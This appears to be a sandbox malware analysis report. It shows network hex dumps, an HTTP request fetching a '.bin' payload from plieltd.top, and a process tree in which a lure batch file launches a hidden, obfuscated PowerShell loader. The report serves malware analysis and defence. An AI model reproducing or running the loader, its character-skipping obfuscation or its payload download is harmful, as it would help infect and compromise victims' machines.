                                                                                                          2024-10-28 08:22:36 UTC16384INData Raw: 77 c5 0b d9 9e 0f d1 82 6c 1d e2 1f 32 cc 7c af a0 12 e0 fe ee 76 f2 13 8c 46 a5 0c 3a 97 67 9d 79 92 3e 06 2a 7e 0f 1c ed 25 8d fa 38 62 b6 cd 53 98 d4 44 a9 6a ff bb 71 f8 f7 3e 9a 3f e3 9d d8 a4 c1 dd 7b 16 b6 b1 21 ad 8b f4 05 e7 37 42 05 8e 0e cb f1 8b 73 fc 8f 13 d3 56 36 4c 63 2c d3 ed bd d1 fd 46 18 f1 37 ea 06 b8 fa b5 93 e1 7f fd eb d0 cb dd 37 18 f9 e3 3b a6 b7 8e 5b af 12 c9 3d 23 82 92 60 91 3c d9 31 3f ce 24 11 9b 89 2e 38 87 3c 9a a2 59 76 94 14 36 b6 24 43 de 2c 08 34 cf e2 8a 76 1a 7e c9 0d ae a2 6e f2 22 18 c9 dc 23 ec 84 e0 cc 81 fe d5 e8 0a 4c 1c 28 a5 00 af cb 10 4c 2c 0c 12 b6 c7 af 12 1c 16 4c 2c 90 e7 c5 70 b2 c2 db de 16 3b a1 97 0b 55 ea 10 08 d4 c4 a3 6d 11 84 40 bf 93 c1 db 33 79 d8 bd 03 2b c9 c8 08 a9 7d 12 c3 19 fc 3e cd fd
                                                                                                          Data Ascii: wl2|vF:gy>*~%8bSDjq>?{!7BsV6Lc,F77;[=#`<1?$.8<Yv6$C,4v~n"#L(L,L,p;Um@3y+}>
                                                                                                          2024-10-28 08:22:36 UTC16384INData Raw: 18 8a 0f 61 96 b0 df d1 94 19 ba 14 f3 f1 85 aa d1 13 f4 b0 7e fd b8 a9 27 6c a7 c5 8a 72 66 ec 97 bd 2d 72 a1 ea db 8f 66 cc 8e 1b e3 ce 17 37 6d ce b6 45 b0 02 0b e7 d3 69 8a 25 4f 24 2b 39 b7 b9 99 a1 a0 48 de 09 9f 13 db ca d6 9c 49 70 e9 31 cd 58 a2 7c 9b 7d 99 3b 66 96 28 81 e7 6b 3d 94 ef 35 fb d0 32 89 64 97 36 68 aa 5a 89 2f 0a bf aa 56 7c f1 83 a4 8b fe c5 b6 69 0f e3 f5 52 4d 37 02 6c ab 3c bf 25 78 77 3b d6 6d 5a 8d d7 9d 35 37 26 c5 dd 2d 60 60 0b d8 6c c8 77 86 ee 92 d3 ba 09 2b 3d 3f f2 58 15 f6 24 8c 2c 43 4d 2c 76 83 20 f6 5c 5d b0 32 c8 48 ed 03 d1 d0 36 07 fc 61 67 ef 3b 59 6e b3 fc 1a c0 01 8a a9 7e b4 9e 41 e6 a1 30 22 98 00 c5 ba 92 e2 c1 78 f1 1c 05 d5 17 53 71 ff f3 1a 7b 86 43 23 bb b3 2a 59 be dc 0d 46 25 c8 23 5e fd 8f 5c b9 68
                                                                                                          Data Ascii: a~'lrf-rf7mEi%O$+9HIp1X|};f(k=52d6hZ/V|iRM7l<%xw;mZ57&-``lw+=?X$,CM,v \]2H6ag;Yn~A0"xSq{C#*YF%#^\h
                                                                                                          2024-10-28 08:22:37 UTC16384INData Raw: 8e 07 13 21 27 dd 26 40 56 fc 20 26 7a d1 74 82 a4 e3 bd 84 61 65 4b e6 95 59 d2 6c e9 7c 86 9d b5 a6 61 ec 9c cd fc 49 47 3e a6 96 08 da 0b 50 6b 63 03 73 55 d0 0f 00 37 35 22 bc 77 ab a1 bc 4c f8 ff 01 cd 77 f8 dd 85 c1 0f 1d 4a b3 1b 1e 80 c1 d6 ba 2f c4 14 1c 35 ec 5e ee 8c c9 4b 09 9a 91 1c 26 11 30 e1 3f 6a 30 ae 80 bd d6 84 f3 41 0a 55 8b ad 2b dc 81 d2 77 10 52 14 38 cd 14 37 71 83 e7 b5 05 b7 7b b4 04 4b 71 b4 04 ea 2d bf 7a 24 ec 11 f0 b4 bc d5 59 43 7f 49 1d 60 2e 28 81 5d 65 bc 7e 3c 63 f8 f2 85 4a c1 fc 46 38 8b 88 66 6a 1e e5 c8 48 6e d2 7d d5 ce 1b 59 b3 18 0b b2 b7 5e 52 62 69 a0 b4 20 74 39 12 2b ba c7 cc b5 32 0e 61 10 aa 27 03 c0 36 e7 1a f1 dc 52 3d b8 75 86 3e 39 3e 92 f3 31 83 f5 2d 93 4f 42 0f 47 4c 24 e4 0c f8 d5 d0 b1 a0 4e cc b4
                                                                                                          Data Ascii: !'&@V &ztaeKYl|aIG>PkcsU75"wLwJ/5^K&0?j0AU+wR87q{Kq-z$YCI`.(]e~<cJF8fjHn}Y^Rbi t9+2a'6R=u>9>1-OBGL$N
                                                                                                          2024-10-28 08:22:37 UTC16384INData Raw: 63 02 65 01 4e 9a b5 64 cb b3 48 ac 06 8e a8 c8 f7 93 7b 76 7e 6a 51 9b 98 47 75 ee 9d 9a 1a f8 da 04 b0 f2 01 a8 77 75 0f 33 f3 cc 20 25 ba 46 fc 0c c3 34 de b2 05 30 9f ba 02 5e 48 ea 5e f2 72 f6 de e3 09 fc cb e2 cb bc 91 d1 b5 56 eb 59 33 90 e9 2e 05 4d 87 f9 0c 38 1e 6b 2e 78 69 b7 f6 11 20 6c d6 8d cd 62 eb 6e 69 6c ad f4 8d bf 7a ff c4 4a e6 e2 d9 97 a8 87 4e 32 af b0 e8 0f b0 96 01 b4 7c 6c 52 26 a9 6e 56 0f ff b3 10 58 90 ed ae 09 40 96 73 d7 04 f2 d4 78 bc 0a 72 28 d0 76 ba c9 29 1c 47 0c 37 2b 63 bb 52 0e 91 02 1e 9d 87 9a 36 93 e4 5b 38 09 39 8b 6b ac d5 06 69 3b a3 61 38 e3 60 08 27 09 e3 45 f3 45 02 17 c5 93 64 3c 62 01 88 c6 14 31 da ec ac e3 53 72 76 dd ab 6a fc 26 9d 6b be 48 21 50 df 03 64 aa cd 88 ac 38 58 49 f3 8c 9f a5 87 f7 10 7f b8
                                                                                                          Data Ascii: ceNdH{v~jQGuwu3 %F40^H^rVY3.M8k.xi lbnilzJN2|lR&nVX@sxr(v)G7+cR6[89ki;a8`'EEd<b1Srvj&kH!Pd8XI
                                                                                                          2024-10-28 08:22:37 UTC16384INData Raw: 12 83 d0 50 ce 30 b4 03 9f f3 c3 d4 93 97 b3 23 28 c1 0d 33 f8 ea 21 c1 a2 f5 a6 c0 64 c0 f3 d0 a6 31 5e 1b f5 1d bd f2 26 37 eb 03 71 9c d3 9e 20 0c e3 b7 d3 d9 ba bf af 24 ba 55 74 8d 25 e8 42 50 bc 1e 69 3f b9 cf 82 a5 72 27 90 7d da 0f 6f 8b cb bf f2 af dc b3 60 75 7e 68 f3 a5 b6 bc 40 9b 97 d2 b7 96 f0 3e 4d 69 ad 5e bb 24 a3 2c f2 51 3a 0d 4e 11 fe 06 d6 53 dd 33 95 ff 9a d1 0b 0e b0 18 6d a1 fa 5c 4e a0 a6 e2 31 2f a4 8a 93 7e dc 38 8f 2f 19 4c 8d 2b be bb 0d 87 38 9e 7c 7d 5e 41 f3 45 6f a1 31 46 11 53 6c 8d 8b c1 a1 fe c8 3e 67 6b f6 75 12 bb dc 59 91 03 33 fd 63 a7 8a 85 fa b6 9d 1d 85 88 e3 61 d2 61 e6 f7 36 a6 53 87 dd 51 fa e3 34 26 02 10 3d 5b ac 62 a7 1c fe b0 13 dc e6 9d 20 a9 0b 44 f2 47 0a 6d 75 3b df b0 9f bf d5 d9 38 9a 81 6b e7 f9 3d
                                                                                                          Data Ascii: P0#(3!d1^&7q $Ut%BPi?r'}o`u~h@>Mi^$,Q:NS3m\N1/~8/L+8|}^AEo1FSl>gkuY3caa6SQ4&=[b DGmu;8k=
                                                                                                          2024-10-28 08:22:37 UTC16384INData Raw: 1a 07 52 df f8 0e 57 fa 24 01 37 c7 f4 22 b1 e7 ad b5 ff ef b0 83 0e 36 fe 59 d6 c1 9d 00 af 9b be e7 e3 30 43 02 5b 78 c8 d2 c5 15 21 90 d5 9a b0 6d ed 7a cd 6e 48 e8 75 fd 82 0e 09 58 37 07 b2 5c d7 92 a6 03 3f 61 7e 75 d5 43 ed 70 85 08 91 68 93 2f 1c 40 d0 ed 88 6b a1 0d 2d d9 20 32 59 57 89 9c 23 11 d0 f0 57 98 a3 85 55 59 e3 32 53 cb af 33 66 08 11 f5 69 df 99 9d ee c5 ea ce 57 d0 5b 5d 43 9c 54 de 9a 66 47 32 45 75 37 08 24 f4 2b 7d 9a cd 60 80 1a 80 eb 41 37 52 65 a2 a0 c8 45 40 93 04 6e 09 1f fa 0f cf 28 32 9d 86 a0 47 92 7f 80 fa fa 72 63 d5 2a 39 49 8c 1e 42 a2 bb 17 68 b7 c2 3d 29 45 20 75 28 43 57 39 ce eb c8 da d9 a8 e2 d5 11 37 07 6d 49 62 dd 76 b4 5d 63 5a 78 3b 6b bd f7 c2 56 65 f7 09 10 a7 2e 98 30 60 36 16 7c 1c 73 4f 39 96 48 db 6c f3
                                                                                                          Data Ascii: RW$7"6Y0C[x!mznHuX7\?a~uCph/@k- 2YW#WUY2S3fiW[]CTfG2Eu7$+}`A7ReE@n(2Grc*9IBh=)E u(CW97mIbv]cZx;kVe.0`6|sO9Hl


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.652023104.21.56.1894431948C:\Windows\SysWOW64\msiexec.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-28 08:22:40 UTC169OUTGET /eYyaWC130.bin HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: plieltd.top
                                                                                                          Cache-Control: no-cache
                                                                                                          2024-10-28 08:22:41 UTC978INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 28 Oct 2024 08:22:41 GMT
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Length: 494656
                                                                                                          Connection: close
                                                                                                          Last-Modified: Fri, 25 Oct 2024 13:45:53 GMT
                                                                                                          ETag: "78c40-6254d56708de5"
                                                                                                          Cache-Control: max-age=14400
                                                                                                          CF-Cache-Status: MISS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LwYibvJhUO72EvRkTI0NfVd4AOpY5wxorOpQPJiAXthfDuQKbGHjnr0SZIv8RzUSTVXPUt7L24IRSIVamuDAKcSYMyGImDbrsvexdlLJv0%2ByLxN6GgnNvAW%2BGk2e1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8d9984f7dd882c8e-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1078&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=807&delivery_rate=2601976&cwnd=251&unsent_bytes=0&cid=ea324c56aa9ac49f&ts=1491&x=0"
                                                                                                          2024-10-28 08:22:41 UTC391INData Raw: 0d 75 ff 56 1f e2 14 4e 95 81 14 ee 58 b4 05 39 66 c5 81 db 2d e4 d5 58 38 7e 73 7e 82 6e a6 2c 04 15 ba 50 82 b7 c9 35 4f df 08 07 cd f9 f1 3e ef bb c5 38 ab 7c 04 1d 77 be 68 ac 40 8c d5 30 aa cb ec bf 30 37 ce b4 44 51 e0 59 04 cc 3d 4b e7 7a e5 8f 28 a2 e3 c8 ef 12 d8 e4 ca 6b 15 96 a7 9b d6 22 67 9d f2 0a 97 a2 46 38 8e 3d bd f2 a6 3e 16 b7 83 9e 28 62 82 df 45 da 2a a9 b3 c7 1f 60 00 51 e2 c9 b7 2b 48 67 8a 7e 96 dd 5d 47 be 83 9e 0b fb c6 0e 14 9a 9e 44 43 af 4c c3 ea 16 90 21 5e db 09 c5 56 4a d0 47 ed fd c5 03 65 3c 33 9c d7 e2 76 b9 0b 07 a1 9d b7 5f 0c 33 a3 ed e1 94 d0 c7 35 fa 2b 36 77 ca 80 b4 18 63 7c 7c d9 56 e0 b5 4f f9 1f 08 87 81 b5 b8 40 6d ca 29 81 65 c6 0a 9b ec 1a 4a e5 40 cf 1b 05 3e bc b6 68 8a e9 1d 3a 31 64 3b 61 d5 c1 c2 8c 04
                                                                                                          Data Ascii: uVNX9f-X8~s~n,P5O>8|wh@007DQY=Kz(k"gF8=>(bE*`Q+Hg~]GDCL!^VJGe<3v_35+6wc||VO@m)eJ@>h:1d;a
                                                                                                          2024-10-28 08:22:41 UTC1369INData Raw: d6 b7 9c 76 ea 59 78 a2 94 ee ed 3c fb c3 bb 5a f3 b4 50 39 c3 ba c7 b5 ea 7e 2f 58 97 1c a6 f3 b6 38 37 fa a7 13 63 a1 48 56 1f f7 53 38 b6 f5 be 19 fb ff 18 18 c0 f1 b7 7a 46 2d 7f c9 a3 74 0b fa 6a 72 ba 9e 40 5e 23 5e 89 73 fc df fb a9 50 8e a2 3c 7c 5c 22 55 4a 00 29 e0 7c 8e 58 ee d2 2c 4a 6c 6a b9 16 e9 e3 0b 83 bc fd a4 21 37 a6 e1 e5 ad 47 4c f0 3d 23 b8 41 0c 91 8f 17 f6 39 92 51 57 9b 61 f8 c6 78 c3 11 64 07 b4 90 14 63 d9 1b 14 8f 62 83 c5 4c 0f a5 70 4b c1 bc 05 25 a4 e5 b2 26 df cd da 93 99 52 e5 47 87 70 85 ec 87 0e e4 a1 e1 32 53 40 16 c7 64 08 11 78 2f de 10 1c 16 c7 ea ce 6c 20 03 04 ab a3 21 57 1b 92 b0 43 40 9e 15 93 95 f4 28 0f 9f 46 d9 78 18 80 eb cc 71 53 ec 23 a0 cb 45 40 a8 f4 38 00 92 dd 20 34 cd af eb e7 a0 cc 1a 22 8d 71 35 0a
                                                                                                          Data Ascii: vYx<ZP9~/X87cHVS8zF-tjr@^#^sP<|\"UJ)|X,Jlj!7GL=#A9QWaxdcbLpK%&RGp2S@dx/l !WC@(FxqS#E@8 4"q5
                                                                                                          2024-10-28 08:22:41 UTC1369INData Raw: be 86 4a 83 00 38 c5 6a 57 32 9d 14 78 b5 d1 74 5f c4 92 d8 38 c6 4f 58 c1 e1 8a f6 13 78 40 5f 1e c5 20 76 5b 4d 80 d5 ec 82 91 b7 e4 55 de 59 78 8a 65 6e b8 3c 13 e5 8c 59 f3 e8 93 81 eb ee 80 b5 02 83 22 59 97 74 5d 73 f3 38 ff e2 92 10 67 f8 8b 3c 1f 4e 13 6e f1 f5 d6 e1 c8 ef 18 70 d5 70 f2 7a ae c5 4b ca b3 2d c8 43 b2 26 fd 8e a8 2f 2f 5e 89 1b f3 5e be a9 b8 d4 78 39 7c 01 e0 ec 8a 54 fe e7 94 21 1e ee d2 44 53 ed 2f b9 fe 25 d7 08 83 e5 3e 1d d1 63 e1 e1 ed 34 4a 84 cb 55 00 69 d7 0a 79 01 23 f5 39 cb 92 ee 13 34 bf c6 90 4b 1c 64 07 dc bd 95 26 3d 20 b2 bb 79 83 9c 8f ed 76 cf 43 d4 fb 05 cd 2c d6 b2 26 b7 fa 5b d6 99 2a 68 73 84 75 dc 2f ed 0e 5d 09 b4 75 53 a8 66 f4 64 08 79 39 ae 9b 10 f4 66 f3 e9 ce 35 e3 94 58 98 9c 55 bf 59 9f 45 32 2d d5
                                                                                                          Data Ascii: J8jW2xt_8OXx@_ v[MUYxen<Y"Yt]s8g<NnppzK-C&//^^x9|T!DS/%>c4JUiy#94Kd&= yvC,&[*hsu/]uSfdy9f5XUYE2-
                                                                                                          2024-10-28 08:22:41 UTC1369INData Raw: d2 2f 02 dc 63 03 cf e4 08 73 38 78 8c 4d 95 10 f5 bd d1 46 80 ce 22 ee b5 cf 03 a2 d1 fc a0 34 0c f1 d5 cc 80 b4 31 58 c4 c1 0f c6 f4 13 53 f6 c2 23 e4 16 da 14 99 10 55 02 9f 46 f9 ba b2 81 1e 12 ec ed ba 89 6e b6 07 a3 35 7a fc 5c df 27 7f 79 2c 45 93 b7 ad d7 a7 1e 78 88 b4 ed 3e 6c 04 f6 65 70 b4 b1 af 2d 93 2e 82 b5 b5 25 72 02 54 49 2d 1f 35 dc ef 96 06 3f 67 a1 48 d7 f3 2b 53 3a b6 7e 36 b8 1b 84 5f 18 83 a7 84 a1 11 82 1f a2 f4 74 30 7b 6e 72 ba 8e 3e 71 9d be e2 34 fc 89 13 13 7b 35 4c b9 41 b8 48 12 4a ff e0 92 66 29 99 21 3a 69 64 6c 6a d1 a6 96 a6 0b 6b f9 d2 a7 21 6e f0 09 5d 81 44 84 92 b0 6f cc 82 e2 83 bf 17 f6 b2 d7 5d 7a 25 62 f8 c6 77 47 6b 65 07 b4 d8 97 8b 3c c7 97 f9 7b 83 c5 cc ba f2 5c 0c 81 bd 70 2b 2f 2a 5a 17 ea cd da c0 66 d7
                                                                                                          Data Ascii: /cs8xMF"41XS#UFn5z\'y,Ex>lep-.%rTI-5?gH+S:~6_t0{nr>q4{5LAHJf)!:idljk!n]Do]z%bwGke<{\p+/*Zf
                                                                                                          2024-10-28 08:22:41 UTC1369INData Raw: 4b 5b f0 14 a4 c1 bf 31 c8 ee 49 96 12 53 82 a7 33 0e 01 cf a8 f0 97 c8 ee 0e 03 23 78 6c 48 de 9c 7d d7 5c f0 4f ea 35 14 76 fc 62 12 23 e3 e2 02 81 2c 51 2c 28 52 08 39 a5 d2 ed 86 32 6b 00 6f 24 f1 60 c9 33 67 91 3f a7 1c f2 79 db 12 d8 31 d5 0b 2d f3 15 a6 7b 4f 21 83 82 33 c3 4b 7e 10 da 15 15 4b 7c 8c 60 7f e2 32 cb fc 1e e5 a4 7e b2 04 93 de 1f 4a 74 15 63 a4 44 14 86 29 61 66 73 67 1d 5c f6 c4 84 ff 54 31 e9 fe 5a a4 4e 86 52 c3 37 83 91 fe 2b 7a 31 5b 36 e1 f3 e1 c7 c1 98 a7 9e 23 85 5c 06 4a 7a 17 1e 9a a5 69 e6 2d 85 18 95 94 d5 a3 2a 2c 3f f2 8d 97 44 5b ad 95 a4 d0 8e cd 1a 07 4a d9 19 fe b7 2d 83 17 36 1b c5 aa 32 23 d8 0e 24 ad b7 29 12 36 b0 94 2c 1d 93 bc d3 16 64 a7 2f 97 ec a8 29 65 13 92 b1 52 55 91 ee cb b0 6f cc 86 5b 6e c4 13 09 0a
                                                                                                          Data Ascii: K[1IS3#xlH}\O5vb#,Q,(R92ko$`3g?y1-{O!3K~K|`2~JtcD)afsg\T1ZNR7+z1[6#\Jzi-*,?D[J-62#$)6,d/)eRUo[n
                                                                                                          2024-10-28 08:22:41 UTC1369INData Raw: b4 88 5c ca 76 b4 57 3e 64 0b 78 66 95 5e 94 26 05 60 d5 9b 97 57 c8 76 1f de 25 5e 7c 98 96 84 22 b4 3a 57 52 c8 f0 f3 6d 91 58 f4 0f 03 38 c9 2c 74 98 ee 7f fd c3 53 08 5f 8a 06 00 a9 ac f0 97 c8 94 0e 1d 62 30 6a 40 de 9c 78 6f 62 f0 12 bf d6 5c 0c b6 3d 1b 1e 31 88 54 87 99 9d 3e 87 f8 7a 2d 0a 3a 55 80 c9 bd 6a 3f 22 7b ac 2b 9d cd 06 a0 31 b2 a8 2a 24 c4 39 7d 7c 43 59 0f 67 f7 13 53 f4 81 a6 6c 62 5f 10 10 04 04 67 08 a7 a5 c9 2f 4d cf 10 64 09 77 ca 7e 3f cb 5f 41 80 a3 0b 98 2f f3 4f ac 36 28 48 f3 f8 e2 18 29 69 5b 06 18 c1 04 3c e9 d1 38 59 8d c5 3c 45 97 5d bd 89 d0 a6 14 d8 aa 18 9e d0 da 0f 58 ec ec 51 c3 9d 49 1f 90 c7 49 0a 6e f1 f1 e2 18 18 89 a1 3c b1 ae bc 81 36 4c ff c3 12 05 7f ba 8e c3 78 23 d5 46 9b 66 21 04 56 db fd c7 ca 94 c9 dd
                                                                                                          Data Ascii: \vW>dxf^&`Wv%^|":WRmX8,tS_b0j@xob\=1T>z-:Uj?"{+1*$9}|CYgSlb_g/Mdw~?_A/O6(H)i[<8Y<E]XQIIn<6Lx#Ff!V
                                                                                                          2024-10-28 08:22:41 UTC1369INData Raw: 93 80 fb dc 5e 16 78 a0 3c 65 4b 36 98 2c fd 64 1d ac 29 5a 7d 1c 8a e3 81 4b 0a f3 45 fa 51 06 40 d5 9e 0b 8a 6b 40 57 61 4b bb 97 c1 11 d2 5d 69 23 9e f4 78 f9 bd d7 e9 9d c8 36 59 54 7f 47 20 e7 1a 5b d3 5f b1 05 56 8c b7 37 cb 57 5c 37 0f 0c 2a 3c 84 93 91 bd 59 7f d5 8b 37 ee c4 1d 60 e1 0b 23 64 32 e8 6a 23 38 1e 33 cb f6 60 98 87 1e 81 fe fc 78 6f 46 19 ed 40 04 41 76 31 87 18 1e 31 88 54 87 99 9d 95 81 f8 7a f6 81 c9 f9 f5 c5 cf 6e 31 6b b1 44 56 ad da f9 2f f9 5a 3e 46 78 9a f4 31 b0 25 23 e4 45 3f 90 2f 5b c1 82 37 b7 44 60 39 bf d9 c8 a0 d3 e0 a9 1f ce 64 85 fd 6a f8 26 04 c6 bf 48 41 84 ab 86 70 4f 79 93 bb d2 e6 8c 78 57 e6 07 0e e6 24 ef 16 3e c9 03 e2 98 f7 b1 06 6f 48 43 2f 49 ee 7b 2f d2 e3 38 aa 78 79 03 d1 80 ff fb ec 5f b7 a9 26 c7 20
                                                                                                          Data Ascii: ^x<eK6,d)Z}KEQ@k@WaK]i#x6YTG [_V7W\7*<Y7`#d2j#83`xoF@Av11Tzn1kDV/Z>Fx1%#E?/[7D`9dj&HApOyxW$>oHC/I{/8xy_&
                                                                                                          2024-10-28 08:22:41 UTC1369INData Raw: ce a4 77 74 c7 5c 85 b6 f0 d4 a5 ec bd 8f e8 37 ab 01 ca 7f 71 9d 4f 13 c4 8e 97 58 2e 69 b9 29 94 e9 62 de ad ae a3 7b 76 c0 11 b4 6b 22 2a 52 5f 63 fa cc 5c 6c df c0 ad 04 e0 c4 fc 8d 92 e3 ae 14 f2 b7 02 80 06 21 15 21 bd 48 95 0b fe 2f 03 bf 0f b8 b4 d5 8c 8e 50 8d 78 c5 9b 82 b7 41 3a 9d f7 7d 39 9f 2d 10 da a3 44 6e 17 de 25 00 be cf c8 89 fe da 96 7d 1a 37 65 0c 8c 68 84 32 28 03 5a 38 d3 8b a2 65 db 15 05 16 94 a3 01 02 b9 c4 9c d4 7f 5e 2f e1 6f ed b0 09 41 fa 8c 28 b4 e4 b6 29 7d d0 50 d7 b5 24 8f 57 f4 d1 c1 66 6a 8a 4c 5c 0b 7a 09 a5 fe 55 48 25 42 95 ec 6d b9 86 d5 63 58 f8 d4 8d 7e fe d1 50 e0 be d9 dc a7 f6 18 c6 37 1f 91 77 c5 6b 7a 3c 9d 14 41 bf 4f 31 5f 2c 80 2f 3f c6 ff bc ab e1 33 9f 96 27 40 b7 ca 16 e2 72 98 ce ab 6c 44 d1 6e 1d a6
                                                                                                          Data Ascii: wt\7qOX.i)b{vk"*R_c\l!!H/PxA:}9-Dn%}7eh2(Z8e^/oA()}P$WfjL\zUH%BmcX~P7wkz<AO1_,/?3'@rlDn
                                                                                                          2024-10-28 08:22:41 UTC1369INData Raw: 73 06 d6 98 62 cb 32 e3 b4 2c 39 d9 b6 73 1a b9 c8 e9 48 07 5e 5c 6a d1 54 8b 32 b6 5e 4c 38 4e 21 e1 9d e6 7d eb 6d 85 8e dd bf 1e e8 82 de 87 7d f3 6b 61 24 69 66 fb 77 a4 54 e5 af e8 8d 32 3d 0e 37 13 d9 b0 38 6a e9 a4 88 45 01 9e 15 b9 ee 09 4d 33 2b 39 4c 2b 49 10 b7 5f 0c 63 28 2f 72 93 0b 70 d0 c7 6a f3 28 0c ae 71 4f a1 ea 02 5f 71 9e be d8 62 71 1c 68 a4 cb 57 0a 36 f1 dd 57 cc f5 50 69 5b 64 0b 87 42 3c 17 e3 63 0c 30 3a ea 66 a8 df b7 97 93 2d e8 f2 90 96 d2 25 b4 05 57 ca 34 0f 0c 6d af 51 f4 25 b6 73 dd 2c 1e 37 0f b1 ea 99 88 e7 f1 e9 13 ec 3b a8 32 9f 43 32 2b 7c 99 87 6a 48 de 88 a3 8e 0d fc 1d 2b 9d da 2c ba e9 44 57 79 ac 06 27 69 a4 c0 ba 03 85 94 6f 0d 42 2e 24 3b 6f 6f a9 3e 45 56 2f 16 fd 00 f8 98 f6 2e cd 34 4d ce a7 19 5e 6c 39 d7
                                                                                                          Data Ascii: sb2,9sH^\jT2^L8N!}m}ka$ifwT2=78jEM3+9L+I_c(/rpj(qO_qbqhW6WPi[dB<c0:f-%W4mQ%s,7;2C2+|jH+,DWy'ioB.$;oo>EV/.4M^l9
                                                                                                          2024-10-28 08:22:41 UTC1369INData Raw: 93 35 c2 e6 29 5f 0c 10 b5 39 6e 83 3c f7 3b 9d 4b 34 75 c0 d2 35 db 21 a1 a0 85 e6 cb 0c be b3 20 71 cf 27 1b 49 af 19 1d 69 ce 3e 38 96 62 0d 55 1c 64 1b 66 d5 ff ad f2 2d f0 fe e2 73 61 d7 ae d1 89 12 b0 32 23 42 2f 3d 8f 45 a0 69 21 9a fe e2 93 af 26 08 14 17 df 28 0f 41 0f ad b5 e2 2a df eb 37 c8 85 d3 52 7a e9 7e c8 c3 13 c7 59 c7 95 30 6d e9 a1 01 40 ce 9b ab 29 89 03 74 32 8a 23 a1 9d e2 d2 20 09 26 1e ee 56 97 8f 7a a7 9b 96 2e ec 01 03 86 75 76 ec d4 35 ba f2 de e1 9e c4 e9 34 22 a8 a5 eb 3f 1b ef c9 51 a3 7e 39 a3 5b 6f 72 6c ad e0 6b 06 6c 85 a0 e3 73 3c 92 3b 55 eb e8 d1 79 69 2d f8 33 f0 3a c9 38 4a d5 6d a7 0c bc 90 03 ec 24 d3 8b 98 8d 86 c8 12 53 1c b9 8a 82 cc 27 40 bc 7e bc 24 1d 53 ed b6 b1 e4 b8 65 d7 78 66 1c 1a 62 a2 e7 ab 7e 6e ce
                                                                                                          Data Ascii: 5)_9n<;K4u5! q'Ii>8bUdf-sa2#B/=Ei!&(A*7Rz~Y0m@)t2# &Vz.uv54"?Q~9[orlkls<;Uyi-3:8Jm$S'@~$Sexfb~n


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:04:22:01
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lista produkt#U00f3w POL56583753Sarchmentdoc.bat" "
                                                                                                          Imagebase:0x7ff675040000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:04:22:01
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:04:22:01
                                                                                                          Start date:28/10/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V 